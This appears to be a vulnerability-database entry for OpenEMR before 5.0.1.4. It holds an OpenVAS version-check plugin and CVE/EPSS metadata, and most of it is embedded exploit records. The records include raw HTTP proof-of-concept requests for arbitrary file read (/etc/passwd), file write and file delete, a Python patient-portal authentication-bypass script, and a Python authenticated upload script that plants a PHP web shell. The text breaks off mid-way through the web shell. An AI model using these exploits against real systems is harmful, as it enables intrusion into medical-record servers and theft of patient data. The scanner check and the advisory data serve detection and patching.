Description
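This host is running OpenEMR and is prone to multiple vulnerabilities.
The check is version-based: it flags OpenEMR versions before 5.0.1.4, and the vendor fix is to upgrade to OpenEMR 5.0.1.4 or later.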
Related
{"id": "OPENVAS:1361412562310112356", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "OpenEMR < 5.0.1.4 Multiple Vulnerabilities", "description": "This host is running OpenEMR and is\n prone to multiple vulnerabilities.", "published": "2018-08-14T00:00:00", "modified": "2019-08-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112356", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "references": ["https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/", "https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485", "https://github.com/openemr/openemr/pull/1765/files", "https://github.com/openemr/openemr/pull/1758/files", "https://www.open-emr.org/wiki/index.php/OpenEMR_Patches", "https://github.com/openemr/openemr/pull/1757/files", "https://insecurity.sh/reports/openemr.pdf"], "cvelist": ["CVE-2018-15139", "CVE-2018-15152", "CVE-2018-15155", "CVE-2018-15153", "CVE-2018-15144", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15141", "CVE-2018-15145", "CVE-2018-15147", "CVE-2018-15143", "CVE-2018-15142", "CVE-2018-15140", "CVE-2018-15146", "CVE-2018-15150", "CVE-2018-15154", "CVE-2018-15151", "CVE-2018-15156"], "immutableFields": [], "lastseen": "2019-08-07T14:47:38", "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17", "AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6", "AKB:C4DD3F24-796A-4A1A-8E1E-DE5E4F6D3E48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15143", "CVE-2018-15144", "CVE-2018-15145", "CVE-2018-15146", "CVE-2018-15147", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15150", "CVE-2018-15151", "CVE-2018-15152", 
"CVE-2018-15153", "CVE-2018-15154", "CVE-2018-15155", "CVE-2018-15156"]}, {"type": "dsquare", "idList": ["E-656", "E-657", "E-658", "E-659"]}, {"type": "exploitdb", "idList": ["EDB-ID:45202", "EDB-ID:49998", "EDB-ID:50017", "EDB-ID:50122"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148956", "PACKETSTORM:163110", "PACKETSTORM:163181", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-30893", "1337DAY-ID-36407", "1337DAY-ID-36428", "1337DAY-ID-36549"]}], "rev": 4}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15143", "CVE-2018-15144", "CVE-2018-15145", "CVE-2018-15146", "CVE-2018-15147", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15150", "CVE-2018-15151", "CVE-2018-15152", "CVE-2018-15153", "CVE-2018-15154", "CVE-2018-15155", "CVE-2018-15156"]}, {"type": "dsquare", "idList": ["E-656", "E-657", "E-658", "E-659"]}, {"type": "exploitdb", "idList": ["EDB-ID:45202"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148956"]}, {"type": "zdt", "idList": ["1337DAY-ID-30893"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-15139", "epss": "0.930790000", "percentile": "0.984660000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15152", "epss": "0.143260000", "percentile": "0.948160000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15155", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15153", "epss": "0.953080000", "percentile": "0.988940000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15144", "epss": "0.001780000", "percentile": "0.532880000", 
"modified": "2023-03-15"}, {"cve": "CVE-2018-15148", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15149", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15141", "epss": "0.002760000", "percentile": "0.631360000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15145", "epss": "0.001610000", "percentile": "0.509990000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15147", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15143", "epss": "0.001610000", "percentile": "0.509990000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15142", "epss": "0.018360000", "percentile": "0.864080000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15140", "epss": "0.007560000", "percentile": "0.781820000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15146", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15150", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15154", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15151", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15156", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}], "vulnersScore": -0.2}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "e2307137137fa0958cb01d7ad1f3f68c"}, "pluginID": "1361412562310112356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenEMR < 5.0.1.4 Multiple Vulnerabilities\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# 
it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112356\");\n script_version(\"2019-08-06T09:01:24+0000\");\n script_cve_id(\"CVE-2018-15139\", \"CVE-2018-15140\", \"CVE-2018-15141\",\n \"CVE-2018-15142\", \"CVE-2018-15143\", \"CVE-2018-15144\", \"CVE-2018-15145\",\n \"CVE-2018-15146\", \"CVE-2018-15147\", \"CVE-2018-15148\", \"CVE-2018-15149\",\n \"CVE-2018-15150\", \"CVE-2018-15151\", \"CVE-2018-15152\", \"CVE-2018-15153\",\n \"CVE-2018-15154\", \"CVE-2018-15155\", \"CVE-2018-15156\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-06 09:01:24 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-14 09:22:33 +0200 (Tue, 14 Aug 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"OpenEMR < 5.0.1.4 Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenEMR and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws consist of multiple SQL injection vulnerabilities,\n directory traversal vulnerabilities, OS 
command injection vulnerabilities, an authentication bypass vulnerability\n and an unrestricted file upload vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions before 5.0.1.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenEMR version 5.0.1.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1765/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1758/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/files\");\n script_xref(name:\"URL\", value:\"https://insecurity.sh/reports/openemr.pdf\");\n script_xref(name:\"URL\", value:\"https://www.open-emr.org/wiki/index.php/OpenEMR_Patches\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! 
infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[ 'version' ];\nlocation = infos[ 'location' ];\n\nif( version_is_less( version: version, test_version: \"5.0.1-4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1-4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses"}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-16T00:00:00", "type": "exploitpack", "title": "OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55", "href": "", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \n# Date: 2018-08-14\n# Exploit Author: Joshua Fam\n# Twitter : @Insecurity\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Version: < 5.0.1.3 \n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\n\n# 1.Arbitrary File Read:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to read arbitrary files.\n\n# i.Vulnerable Code: \n# if ($_POST['mode'] == 'get') {\n# echo 
file_get_contents($_POST['docid']);\n# exit;\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 26\n\nmode=get&docid=/etc/passwd\n\n# 2.Arbitrary File Write:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to write arbitrary files.\n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'save') {\n# file_put_contents($_POST['docid'], $_POST['content']);\n# exit(true);\n# }\n \n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 54\n\nmode=save&docid=payload.php&content=<?php phpinfo();?>\n\n# After sending this navigate to payload.php at http://hostname/openemr/portal\n\n# 3. Arbitrary File Delete:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to delete a arbitrary file.\n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'delete') {\n# unlink($_POST['docid']);\n# exit(true);\n# }\n \n# ii. 
Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 29\n\nmode=delete&docid=payload.php\n \n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-08-18T01:54:28", "description": "", "cvss3": {}, "published": "2018-08-16T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 File Read / Write / Delete", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "PACKETSTORM:148956", "href": "https://packetstormsecurity.com/files/148956/OpenEMR-5.0.1.3-File-Read-Write-Delete.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \n# Date: 2018-08-14 \n# Exploit Author: Joshua Fam \n# Twitter : @Insecurity \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Version: < 5.0.1.3 \n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 \n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140 \n \n# 1.Arbitrary File Read: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to read arbitrary files. \n \n# i.Vulnerable Code: \n# if ($_POST['mode'] == 'get') { \n# echo file_get_contents($_POST['docid']); \n# exit; \n# } \n \n# ii. 
Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 26 \n \nmode=get&docid=/etc/passwd \n \n# 2.Arbitrary File Write: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to write arbitrary files. \n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'save') { \n# file_put_contents($_POST['docid'], $_POST['content']); \n# exit(true); \n# } \n \n# ii. Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 54 \n \nmode=save&docid=payload.php&content=<?php phpinfo();?> \n \n# After sending this navigate to payload.php at http://hostname/openemr/portal \n \n# 3. Arbitrary File Delete: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to delete a arbitrary file. \n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'delete') { \n# unlink($_POST['docid']); \n# exit(true); \n# } \n \n# ii. 
Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 29 \n \nmode=delete&docid=payload.php \n \n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148956/openemr5013-filereadwritedelete.txt"}, {"lastseen": "2021-06-17T18:43:37", "description": "", "cvss3": {}, "published": "2021-06-17T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-17T00:00:00", "id": "PACKETSTORM:163181", "href": "https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass \n# Date 15.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: All versions prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15152 \n# CWE: CWE-287 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit \n \n''' \nDescription: \nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to \nthe registration page and modifying the requested url to access the desired page. 
Some \nexamples of pages in the portal directory that are accessible after browsing to the \nregistration page include: \n- add_edit_event_user.php \n- find_appt_popup_user.php \n- get_allergies.php \n- get_amendments.php \n- get_lab_results.php \n- get_medications.php \n- get_patient_documents.php \n- get_problems.php \n- get_profile.php \n- portal_payment.php \n- messaging/messages.php \n- messaging/secure_chat.php \n- report/pat_ledger.php \n- report/portal_custom_report.php \n- report/portal_patient_report.php \nNormally, access to these pages requires authentication as a patient. If a user were to visit \nany of those pages unauthenticated, they would be redirected to the login page. \n''' \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--Openemrpath', type=str) \nmy_parser.add_argument('-R', '--PathToGet', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.Openemrpath \npathtoread = args.PathToGet \n \n \n''' \nCheck for vulnerability: \n''' \n# Check, if Registration portal is enabled. If it is not, this exploit can not work \nsession = requests.Session() \ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' \ncheck_vuln = session.get(check_vuln_url).text \nprint('') \nprint('[*] Checking vulnerability: ') \nprint('') \n \nif \"Enter email address to receive registration.\" in check_vuln: \nprint('[+] Host Vulnerable. 
Proceeding exploit') \nelse: \nprint('[-] Host is not Vulnerable: Registration for patients is not enabled') \n \n''' \nExploit: \n''' \nheader = { \n'Referer': check_vuln_url \n} \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread \nExploit = session.get(exploit_url, headers=header) \nprint('') \nprint('[+] Results: ') \nprint('') \nprint(Exploit.text) \nprint('') \n \n \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163181/openemr5013-bypass.txt"}, {"lastseen": "2021-06-14T16:03:07", "description": "", "cvss3": {}, "published": "2021-06-14T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "PACKETSTORM:163110", "href": "https://packetstormsecurity.com/files/163110/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) \n# Date 12.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: Prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 \n \n''' \nDescription: \nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote \nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload \nform and accessing it in the images directory. 
\n''' \n \n \n''' \nBanner: \n''' \nbanner =\"\"\" \n___ _____ __ __ ____ ____ ___ _ _____ \n/ _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n| | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n| |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n\\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n|_| \n \n_____ _ _ _ \n| ____|_ ___ __ | | ___ (_) |_ \n| _| \\ \\/ / '_ \\| |/ _ \\| | __| \n| |___ > <| |_) | | (_) | | |_ \n|_____/_/\\_\\ .__/|_|\\___/|_|\\__| \n|_| \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules \n''' \nimport argparse \nimport requests \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \n \n''' \nAuthentication: \n''' \n# Preparation: \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' \nresponse = session.get(auth_chek_url) \n \n# Header (auth): \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, 
\n'Connection': 'close', \n'Referer': auth_chek_url, \n'Upgrade-Insecure-Requests': '1', \n} \n \n# Body (auth): \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authentication: \nprint('') \nprint('[+] Authentication') \nauth = session.post(auth_url,headers=header, data=body) \n \n \n''' \nExploit: \n''' \nprint('') \nprint('[+] Uploading Webshell:') \n \n# URL: \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' \n \n# Headers (Exploit): \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Body (Exploit): \nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if 
(preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return 